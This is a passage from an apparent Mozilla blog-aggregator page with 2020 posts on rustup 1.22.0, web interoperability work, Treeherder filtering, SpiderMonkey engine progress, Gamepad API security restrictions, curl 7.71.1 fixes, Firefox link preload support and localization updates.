Rustup will also automatically update itself at the end of a normal toolchain update:

rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

What's new in rustup 1.22.0

This release is mostly related to internal rework and tweaks in UI messages. It is effectively a quality-of-life update which includes things such as:

  • Supporting the larger MIPS release files which now exceed 100MB in individual files
  • Supporting running in a lower-memory mode on single-CPU systems, along with detecting any in-place soft-limits on memory consumption in an effort to reduce the chance you run out of RAM during an install on systems like Raspberry Pis
  • When we skip a nightly for missing-component reasons we now tell you all the missing components
  • We now tell you where overrides are coming from in rustup show
  • Added riscv64gc-unknown-linux-gnu version of rustup
  • You can now specify multiple components when installing a toolchain more easily. For example, if you wanted to install nightly with the default profile, but add the IDE support all in one go, you can now run
    rustup toolchain install --profile default --component rls,rust-analysis,rust-src nightly
    

There are many more changes in 1.22.0, with around 90 PRs, though a large number of them are internal changes which you can look at in Github if you want, and you can see a little more detail than the above in our changelog.

Thanks

Thanks to all the contributors who made rustup 1.22.0 possible!

  • Alejandro Martinez Ruiz
  • Alexander D'hoore
  • Ben Chen
  • Chris Denton
  • Daniel Silverstone
  • Evan Weiler
  • Guillaume Gomez
  • Harry Sarson
  • Jacob Lifshay
  • James Yang
  • Joel Parker Henderson
  • John Titor
  • Jonas Platte
  • Josh Stone
  • Jubilee
  • Kellda
  • LeSeulArtichaut
  • Linus Färnstrand
  • LitoMore
  • LIU An (劉安)
  • Luciano Bestia
  • Lzu Tao
  • Manish Goregaokar
  • Mingye Wang
  • Montgomery Edwards
  • Per Lundberg
  • Pietro Albini
  • Robert Collins
  • Rudolf B.
  • Solomon Ucko
  • Stein Somers
  • Tetsuharu Ohzeki
  • Tom Eccles
  • Trevor Arjeski
  • Tshepang Lekhonkhobe

Frédéric WangContributions to Web Platform Interoperability (First Half of 2020)

Note: This blog post was co-authored by AMP and Igalia teams.

Web developers continue to face challenges with web interoperability issues and a lack of implementation of important features. As an open-source project, the AMP Project can help represent developers and aid in addressing these challenges. In the last few years, we have partnered with Igalia to collaborate on helping advance predictability and interoperability among browsers. Standards and the degree of interoperability that we want can be a long process. New features frequently require experimentation to get things rolling, course corrections along the way and then, ultimately as more implementations and users begin exploring the space, doing really interesting things and finding issues at the edges we continue to advance interoperability.

Both AMP and Igalia are very pleased to have been able to play important roles at all stages of this process and help drive things forward. During the first half of this year, here’s what we’ve been up to…

Default Aspect Ratio of Images

In our previous blog post we mentioned our experiment to implement the intrinsic size attribute in WebKit. Although this was a useful prototype for standardization discussions, at the end there was a consensus to switch to an alternative approach. This new approach addresses the same use case without the need of a new attribute. The idea is pretty simple: use specified width and height attributes of an image to determine the default aspect ratio. If additional CSS is used e.g. “width: 100%; height: auto;”, browsers can then compute the final size of the image, without waiting for it to be downloaded. This avoids any relayout that could cause bad user experience. This was implemented in Firefox and Chromium and we did the same in WebKit. We implemented this under a flag which is currently on by default in Safari Tech Preview and the latest iOS 14 beta.

Scrolling

We continued our efforts to enhance scroll features. In WebKit, we began with scroll-behavior, which provides the ability to do smooth scrolling. Based on our previous patch, it has landed and is guarded by an experimental flag “CSSOM View Smooth Scrolling” which is disabled by default. Smooth scrolling currently has a generic platform-independent implementation controlled by a timer in the web process, and we continue working on a more efficient alternative relying on the native iOS UI interfaces to perform scrolling.

We have also started to work on overscroll and overscroll customization, especially for the scrollend event. The scrollend event, as you might expect, is fired when the scroll is finished, but it lacked interoperability and required some additional tests. We added web platform tests for programmatic scroll and user scroll including scrollbar, dragging selection and keyboard scrolling. With these in place, we are now working on a patch in WebKit which supports scrollend for programmatic scroll and Mac user scroll.

On the Chrome side, we continue working on the standard scroll values in non-default writing modes. This is an interesting set of challenges surrounding the scroll API and how it works with writing modes which was previously not entirely interoperable or well defined. Gaining interoperability requires changes, and we have to be sure that those changes are safe. Our current changes are implemented and guarded by a runtime flag “CSSOM View Scroll Coordinates”. With the help of Google engineers, we are trying to collect user data to decide whether it is safe to enable it by default.

Another minor interoperability fix that we were involved in was to ensure that the scrolling attribute of frames recognizes values “noscroll” or “off”. That was already the case in Firefox and this is now the case in Chromium and WebKit too.

Intersection and Resize Observers

As mentioned in our previous blog post, we drove the implementation of IntersectionObserver (enabled in iOS 12.2) and ResizeObserver (enabled in iOS 14 beta) in WebKit. We have made a few enhancements to these useful developer APIs this year.

Users reported difficulties with observe root of inner iframe and the specification was modified to accept an explicit document as a root parameter. This was implemented in Chromium and we implemented the same change in WebKit and Firefox. It is currently available Safari Tech Preview, iOS 14 beta and Firefox 75.

A bug was also reported with ResizeObserver incorrectly computing size for non-default zoom levels, which was in particular causing a bug on twitter feeds. We landed a patch last April and the fix is available in the latest Safari Tech Preview and iOS 14 beta.

Resource Loading

Another thing that we have been concerned with is how we can give more control and power to authors to more effectively tell the browser how to manage the loading of resources and improve performance.

The work that we started in 2019 on lazy loading has matured a lot along with the specification.

The lazy image loading implementation in WebKit therefore passes the related WPT tests and is functional and comparable to the Firefox and Chrome implementations. However, as you might expect, as we compare uses and implementation notes it becomes apparent that determining the moment when the lazy image load should start is not defined well enough. Before this can be enabled in releases some more work has to be done on improving that. The related frame lazy loading work has not started yet since the specification is not in place.

We also added an implementation for stale-while-revalidate. The stale-while-revalidate Cache-Control directive allows a grace period in which the browser is permitted to serve a stale asset while the browser is checking for a newer version. This is useful for non-critical resources where some degree of staleness is acceptable, like fonts. The feature has been enabled recently in WebKit trunk, but it is still disabled in the latest iOS 14 beta.

Contributions were made to improve prefetching in WebKit taking into account its cache partitioning mechanism. Before this work can be enabled some more patches have to be landed and possibly specified (for example, prenavigate) in more detail. Finally, various general Fetch improvements have been done, improving the fetch WPT score. Examples are:

What’s next

There is still a lot to do in scrolling and resource loading improvements and we will continue to focus on the features mentioned such as scrollend event, overscroll behavior and scroll behavior, lazy loading, stale-while-revalidate and prefetching.

As a continuation of the work done for aspect ratio calculation of images, we will consider the more general CSS aspect-ratio property. Performance metrics such as the ones provided by the Web Vitals project is also critical for web developers to ensure that their websites provide a good user experience and we are willing to investigate support for these in Safari.

We love doing this work to improve the platform and we’re happy to be able to collaborate in ways that contribute to bettering the web commons for all of us.

Armen ZambranoIn Filter Treeherder jobs by test or manifest path I describe the feature.

In Filter Treeherder jobs by test or manifest path I describe the feature. In this post I will explain how it came about.

I want to highlight the process between a conversation and a deployed feature. Many times, it is an unseen part of the development process that can be useful for contributors and junior developers who are trying to grow as developers.

Back in the Fall of 2019 I started inquiring into developers’ satisfaction with Treeherder. This is one of the reasons I used to go to the office once in a while. One of these casual face-to-face conversations led to this feature. Mike Conley explained to me how he would look through various logs to find a test path that had failed on another platform (see referenced post for further details).

After I understood the idea, I tried to determine what options we had to implement it. I wrote a Google Doc with various alternative implementations and with information about what pieces were needed for a prototype. I requested feedback from various co-workers to help discover blind spots in my plans.

Once I had some feedback from immediate co-workers, I made my idea available in a Google group (increasing the circle of people giving feedback). I described my intent to implement the idea and was curious to see if anyone else was already working on it or had better ideas on how to implement it. I did this to raise awareness in larger circles, reduce duplicate efforts and learn from prior work.

I also filed a bug to drive further technical discussions and for interested parties to follow up on the work. Fortunately, around the same time Andrew Halberstadt started working on defining explicitly what manifests each task executes before the tasks are scheduled (see bug). This is a major component to make the whole feature on Treeherder functional. In some cases, talking enough about the need can enlist others from their domains of expertise to help with your project.

At the end of 2019 I had time to work on it. Once I endlessly navigated through Treeherder’s code for a few days, I decided that I wanted to see a working prototype. This would validate its value and determine if all the technichal issues had been ironed out. In a couple of days I had a working prototype. Most of the code could be copy/pasted into Treeherder once I found the correct module to make changes in.

Finally, in January the feature landed. There were some small bugs and other follow up enhancements later on.

Stumbling upon this feature was great because on H1 we started looking at changing our CI’s scheduling to use manifests for scheduling instead of tasks and this feature lines up well with it.

Armen ZambranoFilter Treeherder jobs by test or manifest path

At the beginning of this year we landed a new feature on Treeherder. This feature helps our users to filter jobs using test paths or manifest paths.

This feature is useful for developers and code sheriffs because it permits them to determine whether or not a test that fails in one platform configuration also fails in other ones. Previously, this was difficult because certain test suites are split into multiple tasks (aka “chunks”). In the screenshot below, you can see that the manifest path devtools/client/framework/browser-toolbox/test/browser.ini is executed in different chunks.

<figcaption>Showing tasks that executed a specific manifest path</figcaption>

NOTE: A manifest is a file that defines various test files, thus, a manifest path defines a group of test paths. Both types of paths can be used to filter jobs.

This filtering method has been integrated to the existing feature, “Filter by a job field” (the funnel icon). See below what the UI looks like:

<figcaption>Filter by test path</figcaption>

If you’re curious about the work you can visit the PR.

There’s a lot more coming around this realm as we move toward manifest-based scheduling in the Firefox CI instead of task-based scheduling. Stay tuned! Until then keep calm and filter away.

Spidermonkey Development BlogSpiderMonkey Newsletter 5 (Firefox 78-79)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 78 and 79 Nightly release cycles.

If you like these newsletters, you may also enjoy Yulia’s weekly Compiler Compiler live stream, a guided tour of what it is like to work on SpiderMonkey and improve spec compliance.

JavaScript

🎁 New features

Firefox 78
Firefox 79

👷🏽‍♀️ Feature work

⏩ Regular Expression engine update

  • Iain fixed the last blockers and enabled the new engine by default.
  • Iain then implemented support for named capture groups and added a fuzzing target for differential testing of interpreted vs compiled code with libfuzzer.
  • Finally, Iain removed the old engine in Firefox 79 and tidied up the code.

    See the Mozilla Hacks blog post for more details.

🗑️ Garbage Collection

  • Steve enabled incremental WeakMap marking, a big change to help reduce GC pauses.
  • Steve landed changes to de-duplicate strings during nursery GC, based on work done by GC intern Krystal Yang and then rebased by Thinker Li.
  • Jon added a header to nursery-allocated cells and used this to simplify code.
  • Steve created a GC micro-benchmark suite that can be used to compare GC performance on various workloads in different engines / browsers.
  • Jon fixed various issues with GC telemetry data.
  • Jon optimized incremental sweeping by no longer collecting the nursery for every slice.
  • Steve optimized string allocation by allocating a tenured string directly for certain call sites.
  • Yoshi fixed sending telemetry data of promotion rate when nursery was empty.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve performance, simplify a lot of code and improve bytecode caching. It also makes it possible to rewrite our frontend in Rust (see SmooshMonkey item below).

  • Caroline merged LazyScriptCreationData into FunctionCreationData.
  • Ted moved the script atoms from RuntimeScriptData to PrivateScriptData. This allowed merging various classes into ScriptStencil.
  • Ted added snapshotting for incoming scope data to better isolate the parser from the VM.
  • Ted deferred allocation of functions and scripts to the end of bytecode generation, moving us closer to not doing GC-allocations in the frontend.
  • Kannan factored non-GC state out of scope data and changed BindingIter to work with both GC atoms (JSAtom) and the future ParserAtom type.
  • Kannan landed the ParserAtom and ParserAtomsTable types. The next part is converting the frontend to use ParserAtom instead of JSAtom, another big step towards GC-free parsing.

🐒 SmooshMonkey

SmooshMonkey is our project to reimplement the frontend in a safe language (Rust) and make it easier to implement new features and improve long-term maintainability of the code base.

  • Arai is implementing function compilation, while updating the Stencil interface for function.
  • Arai landed a tool and automation to improve the development workflow.
  • Arai bumped the supported Unicode version to 13.
  • Yulia is working on separating the error checking phase from the AST building phase. This will allow running the error checking phase without building an AST for validating JavaScript files when they are received, and also building an AST without doing the validation which would speed-up the first execution of scripts, which are compiled on-demand.
  • Nicolas is rebasing the performance work implemented in a fork, in order to bring it to the main development tree of SmooshMonkey.

🚀 WarpBuilder

WarpBuilder is the JIT project to replace the frontend of our optimizing JIT (IonBuilder) and the engine’s Type Inference mechanism with a new MIR builder based on compiling CacheIR to MIR. WarpBuilder will let us improve security, performance, memory usage and maintainability of the whole engine.

Since the last newsletter we’ve implemented a lot more CacheIR instructions in the transpiler (the part of WarpBuilder responsible for translating CacheIR to MIR). Although we’re still missing a lot of pieces, we’re starting to get very encouraging performance numbers.

  • Tom, Caroline, and Jan added CacheIR and Warp support for many builtin functions (for example Math.floor and Array.isArray) and self-hosting intrinsics. These functions are now also properly optimized in the Baseline Interpreter and JIT.
  • Tom added support for property sets, double arithmetic, TypedArray elements, and many other things to the transpiler.
  • Jan added support for element sets, string concatenation and other things to the transpiler.
  • Caroline added a CacheIR health report mechanism. In the future this will make it easier to analyze performance of JIT code.
  • Jan improved MIR optimizations for slot/element loads followed by an unbox.
  • Christian started fuzzing WarpBuilder.

📈 Miscellaneous optimizations

  • André added JIT optimizations for BigInt64Array and BigUint64Array.
  • Denis replaced the ELEMENT_SLOT in ScriptSourceObject with a callback function.
  • Ted optimized Object.prototype.toString when called with a primitive value to not create a temporary object. This is pretty common on the web.
  • André added JIT optimizations for DataView methods.
  • Iain added a fast path to our JIT stubs for simple atom regular expressions.
  • Jan optimized post-barriers in JIT code.
  • Tom ported String.prototype.concat to self-hosted code so it can take advantage of JIT optimizations.
  • André added various optimizations for Math.pow and the **-operator.
  • Tom added MIR optimizations based on the type of certain objects.
  • Jan optimized the generated JIT code for unboxing Values.

🧹 Miscellaneous changes

  • Logan enabled async-stacks when devtools are open.
  • Jon removed the GCTrace framework (it wasn’t used and didn’t even compile).
  • Jason added support for using generators in self-hosted code, for implementing the Iterator Helpers proposal.
  • Chris added documentation for cross-compiling SpiderMonkey for ARM64
  • Jon added a NestedIterator template and used it to clean up some iterator classes.
  • André added a helper method for more robust MIR type checks, using an allow list instead of deny list
  • Jan simplified new.target handling for eval frames.
  • Yoshi landed minor refactoring on SourceCompressionTask.

WebAssembly

🎁 New features

🧹 Other changes

  • Lars added SIMD support on x64 to the Baseline and Ion compilers (behind a flag)
  • Lars optimized various SIMD operations in the Ion backend.
  • Ryan fixed subclassing of certain WebAssembly objects.
  • Dmitry (from Igalia) started landing some changes to improve the call ABI.
  • Ryan optimized freezing of the exports object to fix a performance issue.
  • Benjamin, Julian, and Chris made Cranelift work on ARM64, thus providing us (soon!) with an optimizing wasm compiler for the platform.
  • Chris added support for multi-values to Cranelift on ARM64.

The Talospace ProjectFirefox 78 on POWER

Firefox 78 is released and is running on this Talos II. This version in particular features an updated RegExp engine but is most notable (notorious) for disabling TLS 1.0/1.1 by default (only 1.2/1.3). Unfortunately, because of craziness at $DAYJOB and the lack of a build waterfall or some sort of continuous integration for ppc64le, a build failure slipped through into release but fortunately only in the (optional) tests. The fix is trivial, another compilation bug in the profiler that periodically plagues unsupported platforms, and I have pushed it upstream in bug 1649653. You can either apply that bug to your tree or add ac_add_options --disable-tests to your .mozconfig. Speaking of, as usual, the .mozconfigs we use for debug and optimized builds have been stable since Firefox 67.

UPDATE: The patch has landed on release, beta and ESR 78, so you should be able to build straight from source.

Support.Mozilla.OrgLet’s meet online: Virtual All Hands 2020

Hi folks,

Here I am again sharing with you the amazing experience of another All Hands.

This time no traveling was involved, and every meeting, coffee, and chat were left online.

Virtuality seems the focus of this 2020 and if on one side we strongly missed the possibility of being together with colleagues and contributors, on the other hand, we were grateful for the possibility of being able to connect.

Virtual All Hands has been running for a week, from the 15th of June to the 18th, and has been full of events and meetups.

As SUMO team we had three events running on Tuesday, Wednesday, and Thursday, along with the plenaries and Demos that were presented on Hubs. Floating in virtual reality space while experiencing and listening to new products and features that will be introduced in the second part of the year has been a super exciting experience and something really enjoyable.

Let’s talk about our schedule, shall we?

On Tuesday we run our Community update meeting in which we focussed around what happened in the last 6 months, the projects that we successfully completed, and the ones that we have left for the next half of the year.

We talked a lot about the community plan, and which are the next steps we need to take to complete everything and release the new onboarding experience before the end of the year.

We did not forget to mention everything that happened to the platform. The new responsive redesign and the ask-a-question flow have greatly changed the face of the support forum, and everything was implemented while the team was working on a solution for the spam flow we have been experiencing in the last month.

If you want to read more about this, here are some forum posts we wrote in the last few weeks you can go through regarding these topics:

On Wednesday we focused on presenting the campaign for the Respond Tool. For those of you who don’t know what I am talking about, we shared some resources regarding the tool here. The campaign will run up until today, but we still need your intake on many aspects, so join us on the tool!

The main points we went through during the meeting were:

  • Introduction about the tool and the announcement on the forum
  • Updates on Mozilla Firefox Browser
  • Update about the Respond Tool
  • Demo (how to reply, moderate, or use canned response) – Teachable course
  • Bugs. If you use the Respond Tool, please file bugs here
  • German and Spanish speakers needed: we have a high volume of review in Spanish and German that need your help!

On Thursday we took care of Conversocial, the new tool that substitutes Buffer from now on. We have already some contributors joining us on the tool and we are really happy with everyone ‘s excitement in using the tool and finally having a full twitter account dedicated to SUMO. @firefoxsupport is here, please go, share and follow!

The agenda of the meeting was the following:

  • Introduction about the tool
  • Contributor roles
  • Escalation process
  • Demo on Conversocial
  • @FirefoxSupport overview

If you were invited to the All Hands or you have NDA access you can access to the meetings at this link: https://onlinexperiences.com

Thank you for your participation and your enthusiasm as always, we are missing live interaction but we have the opportunity to use some great tools as well. We are happy that so many people could enjoy those opportunities and created such a nice environment during the few days of the All Hands.

See you really soon!

The SUMO Team

Hacks.Mozilla.OrgSecuring Gamepad API

Firefox release dates for Gamepad API updates

As part of Mozilla’s ongoing commitment to improve the privacy and security of the web platform, over the next few months we will be making some changes to how the Gamepad_API works.

Here are the important dates to keep in mind:

25 of August 2020 (Firefox 81 Beta/Developer Edition):
.getGamepads() method will only return game pads if called in a “secure context” (e.g., https://).
22 of September 2020 (Firefox 82 Beta/Developer Edition):
Switch to requiring a permission policy for third-party contexts/iframes.

We are collaborating on making these changes with folks from the Chrome team and other browser vendors. We will update this post with links to their announcements as they become available.

Restricting gamepads to secure contexts

Starting with Firefox 81, the Gamepad API will be restricted to what are known as “secure contexts” (bug 1591329). Basically, this means that Gamepad API will only work on sites served as “https://”.

For the next few months, we will show a developer console warning whenever .getGamepads() method is called from an insecure context.

From Firefox 81, we plan to require secure context for .getGamepads() by default. To avoid significant code breakage, calling .getGamepads() will return an empty array. We will display this console warning indefinitely:

Firefox developer console

The developer console nows shows a warning when .getGamepads() method is called from insecure contexts

Permission Policy integration

From Firefox 82, third-party contexts (i.e., <iframe>s that are not same origin) that require access to the Gamepad API will have to be explicitly granted access by the hosting website via a Permissions Policy.

In order for a third-party context to be able to use the Gamepad API, you will need to add an “allow” attribute to your HTML like so:

  <iframe allow="gamepad" src="https://example.com/">
  </iframe>

Once this ships, calling .getGamepads() from a disallowed third-party context will throw a JavaScript security error.

You can our track our implementation progress in bug 1640086.

WebVR/WebXR

As WebVR and WebXR already require a secure context to work, these changes
shouldn’t affect any sites relying on .getGamepads(). In fact, everything should continue to work as it does today.

Future improvements to privacy and security

When we ship APIs we often find that sites use them in unintended ways – mostly creatively, sometimes maliciously. As new privacy and security capabilities are added to the web platform, we retrofit those solutions to better protect users from malicious sites and third-party trackers.

Adding “secure contexts” and “permission policy” to the Gamepad API is part of this ongoing effort to improve the overall privacy and security of the web. Although we know these changes can be a short-term inconvenience to developers, we believe it’s important to constantly evolve the web to be as secure and privacy-preserving as it can be for all users.

The post Securing Gamepad API appeared first on Mozilla Hacks - the Web developer blog.

Daniel Stenbergcurl 7.71.1 – try again

This is a follow-up patch release a mere week after the grand 7.71.0 release. While we added a few minor regressions in that release, one of them were significant enough to make us decide to fix and ship an update sooner rather than later. I’ll elaborate below.

Every early patch release we do is a minor failure in our process as it means we shipped annoying/serious bugs. That of course tells us that we didn’t test all features and areas good enough before the release. I apologize.

Numbers

the 193rd release
0 changes
7 days (total: 8,139)

18 bug fixes (total: 6,227)
32 commits (total: 25,943)
0 new public libcurl function (total: 82)
0 new curl_easy_setopt() option (total: 277)

0 new curl command line option (total: 232)
16 contributors, 8 new (total: 2,210)
5 authors, 2 new (total: 805)
0 security fixes (total: 94)
0 USD paid in Bug Bounties

Bug-fixes

compare cert blob when finding a connection to reuse – when specifying the client cert to libcurl as a “blob”, it needs to compare that when it subsequently wants to reuse a connection, as curl already does when specifying the certificate with a file name.

curl_easy_escape: zero length input should return a zero length output – a regression when I switched over the logic to use the new dynbuf API: I inadvertently modified behavior for escaping an empty string which then broke applications. Now verified with a new test.

set the correct URL in pushed HTTP/2 transfers – the CURLINFO_EFFECTIVE_URL variable previously didn’t work for pushed streams. They would all just claim to be the parent stream’s URL.

fix HTTP proxy auth with blank password – another dynbuf conversion regression that now is verified with a new test. curl would pass in “(nil)” instead of a blank string (“”).

terminology: call them null-terminated strings – after discussions and an informal twitter poll, we’ve rephrased all documentation for libcurl to use the phrase “null-terminated strings” and nothing else.

allow user + password to contain “control codes” for HTTP(S) – previously byte values below 32 would maybe work but not always. Someone with a newline in the user name reported a problem. It can be noted that those kind of characters will not work in the credentials for most other protocols curl supports.

Reverted the implementation of “wait using winsock events” – another regression that apparently wasn’t tested good enough before it landed and we take the opportunity here to move back to the solution we have before. This change will probably take another round and aim to get landed in a better shape in a future.

ngtcp2: sync with current master – interestingly enough, the ngtcp2 project managed to yet again update their API exactly this week between these two curl releases. This means curl 7.71.1 can be built against the latest ngtcp2 code to speak QUIC and HTTP/3.

In parallel with that ngtcp2 sync, I also ran into a new problem with BoringSSL’s master branch that is fixed now. Timely for us, as we can now also boast with having the quiche backend in sync and speaking HTTP/3 fine with the latest and most up-to-date software.

Next

We have not updated the release schedule. This means we will have almost three weeks for merging new features coming up then four weeks of bug-fixing only until we ship another release on August 19 2020. And on and on we go.

Honza BambasFirefox enables link rel=”preload” support

We enabled the link preload web feature support in Firefox 78, at this time only at Nightly channel and Firefox Early Beta and not Firefox Release because of pending deeper product integrity checking and performance evaluation.

What is “preload”

Web developers may use the the Link: <..>; rel=preload response header or <link rel="preload"> markup to give the browser a hint to preload some resources with a higher priority and in advance.

Firefox can now preload number of resource types, such as styles, scripts, images and fonts, as well as responses to be later used by plain fetch() and XHR. Use preload in a smart way to help the web page to render and get into the stable and interactive state faster.

Don’t misplace this for “prefetch”. Prefetching (with a similar technique using <link rel="prefetch"> tags) loads resources for the next user navigation that is likely to happen. The browser fetches those resources with a very low priority without an affect on the currently loading page.

Web Developer Documentation

There is a Mozilla provided MDN documentation for how to use <link rel="preload">. Definitely worth reading for details. Scope of this post is not to explain how to use preload, anyway.

Implementation overview

Firefox parses the document’s HTML in two phases: a prescan (or also speculative) phase and actual DOM tree building.

The prescan phase only quickly tokenizes tags and attributes and starts so called “speculative loads” for tags it finds; this is handled by resource loaders specific to each type. A preload is just another type of a speculative load, but with a higher priority. We limit speculative loads to only one for a URL, so only the first tag referring that URL starts a speculative load. Hence, if the order is the consumer tag and then the related <link preload> tag for the same URL, then the speculative load will only have a regular priority.

At the DOM tree building phase, during which we create actual consuming DOM node representations, the respective resource loader first looks for an existing speculative load to use it instead of starting a new network load. Note that except for stylesheets and images, a speculative load is used only once, then it’s removed from the speculative load cache.

Firefox preload behavior

Supported types

“style”, “script”, “image”, “font”, “fetch”.

The “fetch” type is for use by fetch() or XHR.

The “error” event notification

Conditions to deliver the error event in Firefox are slightly different from e.g. Chrome.

For all resource types we trigger the error event when there is a network connection error (but not a DNS error – we taint error event for cross-origin request and fire load instead) or on an error response from the server (e.g. 404).

Some resource types also fire the error event when the mime type of the response is not supported for that resource type, this applies to style, script and image. The style type also produces the error event when not all @imports are successful.

Coalescing

If there are two or more <link rel="preload"> tags before the consuming tag, all mapping to the same resource, they all use the same speculative preload – coalesce to it, deliver event notifications, and only one network load is started.

If there is a <link rel="preload"> tag after the consuming tag, then it will start a new preload network fetch during the DOM tree building phase.

Sub-resource Integrity

Handling of the integrity metadata for Sub-resource integrity checking (SRI) is a little bit more complicated. For <link rel=preload> it’s currently supported only for the “script” and “style” types.

The rules are: the first tag for a resource we hit during the prescan phase, either a <link preload> or a consuming tag, we fetch regarding this first tag with SRI according to its integrity attribute. All other tags matching the same resource (URL) are ignored during the prescan phase, as mentioned earlier.

At the DOM tree building phase, the consuming tag reuses the preload only if this consuming tag is either of:

  • missing the integrity attribute completely,
  • the value of it is exactly the same,
  • or the value is “weaker” – by means of the hash algorithm of the consuming tag is weaker than the hash algorithm of the link preload tag;
  • otherwise, the consuming tag starts a completely new network fetch with differently setup SRI.

As link preload is an optimization technique, we start the network fetch as soon as we encounter it. If the preload tag doesn’t specify integrity then any later found consuming tag can’t enforce integrity checking on that running preload because we don’t want to cache the data unnecessarily to save memory footprint and complexity.

Doing something like this is considered a website bug causing the browser to do two network fetches:

<link rel="preload" as="script" href="script1.js">
<script src="script1.js" integrity="sha512-....">

The correct way is:

<link rel="preload" as="script" href="script1.js" integrity="sha512-....">
<script src="script1.js">

Specification

The main specification is under W3C jurisdiction here. Preload is also weaved into the Fetch WHATWG specification.

The W3C specification is very vague and doesn’t make many things clear, some of them are:

  • What all types or minimal set of types the browser must or should support. This is particularly bad because specifying a type that is not supported is not firing neither load nor error event on the <link> tag, so a web page can’t detect an unsupported type.
  • What are the exact conditions to fire the error event.
  • How exactly to handle (coalesce) multiple <link rel="preload"> tags for the same resource.
  • How exactly, and if, to handle <link rel="preload"> found after the consuming tag.
  • How exactly to handle the integrity attribute on both the <link preload> and the consuming tag, specifically when it’s missing one of those or is different between the two. Then also how to handle integrity on multiple link preload tags.

The post Firefox enables link rel=”preload” support appeared first on mayhemer's blog.

Mozilla Localization (L10N)L10n Report: June 2020 Edition

Welcome!

New community/locales added

New content and projects

What’s new or coming up in Firefox desktop

Deadlines

Upcoming deadlines:

  • Firefox 78 is currently in beta and will be released on June 30. The deadline to update localization was on Jun 16.
  • The deadline to update localizations for Firefox 79, currently in Nightly, will be July 14 (4 weeks after the previous deadline).
Fluent and migration wizard

Going back to the topic of how to use Fluent’s flexibility at your advantage, we recently ported the Migration Wizard to Fluent. That’s the dialog displayed to users when they import content from other browsers.

Before Fluent, this is how the messages for “Bookmarks” would look like:

32_ie=Favorites
32_edge=Favorites
32_safari=Bookmarks
32_chrome=Bookmarks
32_360se=Bookmarks

That’s one string for each supported browser, even if they’re all identical. This is how the same message looks like in Fluent:

browser-data-bookmarks-checkbox =
  .label = { $browser ->
     [ie] Favorites
     [edge] Favorites
    *[other] Bookmarks
  }

If all browsers use the same translations in a specific language, this can take advantage of the asymmetric localization concept available in Fluent, and be simplified (“flattened”) to just:

browser-data-bookmarks-checkbox =
  .label = Translated_bookmarks

The same is true the other way around. The section comment associated to this group of strings says:

## Browser data types
## All of these strings get a $browser variable passed in.
## You can use the browser variable to differentiate the name of items,
## which may have different labels in different browsers.
## The supported values for the $browser variable are:
##   360se
##   chrome
##   edge
##   firefox
##   ie
##   safari
## The various beta and development versions of edge and chrome all get
## normalized to just "edge" and "chrome" for these strings.

So, if English has a flat string without selectors:

browser-data-cookies-checkbox =
    .label = Cookies

A localization can still provide variants if, for example, Firefox is using a different term for cookies than other browsers:

browser-data-cookies-checkbox =
    .label = { $browser ->
        [firefox] Macarons
       *[other] Cookies
}
HTTPS-Only Error page

There’s a new mode, called “HTTPS-Only”, currently tested in Nightly: when users visit a page not available with a secure connection, Firefox will display a warning.

In order to test this page, you can change the value of the dom.security.https_only_mode preference in about:config, then visit this website. Make sure to test the page with the window at different sizes, to make sure all elements fit.

What’s new or coming up in mobile

Concerning mobile right now, we just got updated screenshots for the latest v27 of Firefox for iOS: https://drive.google.com/drive/folders/1ZsmHA-qt0n8tWQylT1D2-J4McjSZ-j4R

We are trying out several options for screenshots going forwards, so stayed tuned so you can tell us which one you prefer.

Otherwise our Fenix launch is still in progress. We are string frozen now, so if you’d like to catch up and test your work, it’s this way: https://pontoon.mozilla.org/projects/android-l10n/tags/fenix/

You should have until July 18th to finish all l10n work on this project, before the cut-off date.

What’s new or coming up in web projects

Firefox Accounts

A third file called main.ftl was added to Pontoon a couple of weeks ago in preparation to support subscription based products. This component contains payment strings for the subscription platform, which will be rolled out to a few countries initially. The staging server will be opened up for localization testing in the coming days. An email with testing instruction and information on supported markets will be sent out as soon as all the information is gathered and confirmed. Stay tuned.

Mozilla.org

In the past month, several dozens of files were added to Pontoon, including new pages. Many of the migrated pages include updates. To help prioritize, please focus on

  • resolving the orange warnings first. This usually means that a brand or product name was not converted in the process. Placeables no longer match those in English.
  • completing translation one page at a time. Coordinate with other community members, splitting up the work page by page, and conduct peer review.

Speaking of brands, the browser comparison pages are laden with brand and product names, well-known company names. Not all the brand names went to the brands.ftl. This is due to some of the names being mentioned once or twice, or limited to just one file. We do not want to overload the brands.ftl with too many of these rarely used names. The general rule for these third party brands and product names is, keep them unchanged whenever possible.

We skipped WNP#78 but we will have WNP#79 ready for localization in the coming weeks.

Transvision now supports mozilla.org in Fluent format. You can leverage the tool the same way you did before.

What’s new or coming up in Foundation projects

Donate websites

Back in November last year, we mentioned we were working on making localizable the remaining part of the content (the content stored in a CMS) from the new donate website. The site was launched in February, but the CMS localization systems still need some work before the CMS-based content can be properly localized.

Over the next few weeks, Théo will be working closely with the makers of the CMS the site is using, to fix the remaining issues, develop new localization capabilities and enable CMS content localization.

Once the systems are operational and if you’re already translating the Donate website UI project, we will add the following two new projects to your dashboard with the remaining content, one for the Thunderbird instance and another one for the Mozilla instance. The vast majority of this content has already been translated, so you should be able to leverage previous translations using the translation memory feature in Pontoon. But because some longer strings may have been split differently by the system, they may not show up in translation memory. For this reason, we will enable back the old “Fundraising” project in Pontoon, in read-only mode, so that you can easily search and access those translations if you need to.

What’s new or coming up in Pontoon

  • Translate Terminology. We’ve added a new Terminology project to Pontoon, which contains all Terms from Mozilla’s termbase and lets you translate them. As new terms will be added to Pontoon, they will instantly appear in the project and be ready for translation.There’s also a “Translate” link next to each term in the Terms tab and panel, which makes it easy to translate terms as they are used.
  • More relevant API results. Thanks to Vishnudas, system projects (e.g. Tutorial) are now excluded from the default list of projects returned by the API. You can still include system projects in the response if you use set the includeSystem flag to true.

Events

  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver, and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

  • Robb P. , who has not only become top localizer for the Romanian community, but has become a reliable and proactive localizer.

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Giorgio MaoneSave Trust, Save OTF

OTF-funded security/privacy FLOSS

